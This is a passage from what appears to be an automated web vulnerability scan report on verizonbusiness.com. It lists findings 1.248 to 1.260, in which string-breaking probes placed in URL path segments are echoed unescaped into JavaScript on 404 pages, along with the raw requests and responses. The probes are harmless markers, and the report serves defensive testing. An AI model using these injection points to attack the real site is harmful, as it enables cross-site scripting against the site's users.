<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/managedd14b0";44351732e11/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.248. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1058a'%3bd98a0c15b3a was submitted in the REST URL parameter 3. This input was echoed as 1058a';d98a0c15b3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/managed1058a'%3bd98a0c15b3a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/managed1058a';d98a0c15b3a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.249. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe4b1"%3bbdcf35b5e0f was submitted in the REST URL parameter 1. This input was echoed as fe4b1";bdcf35b5e0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsfe4b1"%3bbdcf35b5e0f/networking/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsfe4b1";bdcf35b5e0f/networking/point-to-point/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.250. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab839'%3b47228117105 was submitted in the REST URL parameter 1. This input was echoed as ab839';47228117105 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsab839'%3b47228117105/networking/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsab839';47228117105/networking/point-to-point/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.251. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4caf5'%3b66c3ac51b69 was submitted in the REST URL parameter 2. This input was echoed as 4caf5';66c3ac51b69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking4caf5'%3b66c3ac51b69/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking4caf5';66c3ac51b69/point-to-point/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.252. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8f3f"%3b94dfddd759e was submitted in the REST URL parameter 2. This input was echoed as f8f3f";94dfddd759e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingf8f3f"%3b94dfddd759e/point-to-point/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:48 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42333
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networkingf8f3f";94dfddd759e/point-to-point/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.253. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a105"%3b3c469b02d03 was submitted in the REST URL parameter 3. This input was echoed as 2a105";3c469b02d03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/point-to-point2a105"%3b3c469b02d03/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43224
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking/point-to-point2a105";3c469b02d03/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.254. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/point-to-point/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41353'%3bea99ac7d785 was submitted in the REST URL parameter 3. This input was echoed as 41353';ea99ac7d785 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/point-to-point41353'%3bea99ac7d785/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43224
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/point-to-point41353';ea99ac7d785/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.255. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4683"%3bd3f1738ab2e was submitted in the REST URL parameter 1. This input was echoed as d4683";d3f1738ab2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd4683"%3bd3f1738ab2e/networking/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsd4683";d3f1738ab2e/networking/private/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.256. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66573'%3b550baaaab48 was submitted in the REST URL parameter 1. This input was echoed as 66573';550baaaab48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products66573'%3b550baaaab48/networking/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products66573';550baaaab48/networking/private/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.257. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff012'%3bc2dc23e2a19 was submitted in the REST URL parameter 2. This input was echoed as ff012';c2dc23e2a19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networkingff012'%3bc2dc23e2a19/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/networkingff012';c2dc23e2a19/private/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.258. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 318cd"%3bfc1a5f74697 was submitted in the REST URL parameter 2. This input was echoed as 318cd";fc1a5f74697 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking318cd"%3bfc1a5f74697/private/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/networking318cd";fc1a5f74697/private/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.259. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eaed'%3b470ed5b6194 was submitted in the REST URL parameter 3. This input was echoed as 5eaed';470ed5b6194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/private5eaed'%3b470ed5b6194/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/networking/private5eaed';470ed5b6194/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.260. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/networking/private/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9728"%3bae12270c155 was submitted in the REST URL parameter 3. This input was echoed as d9728";ae12270c155 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/networking/privated9728"%3bae12270c155/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:56 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
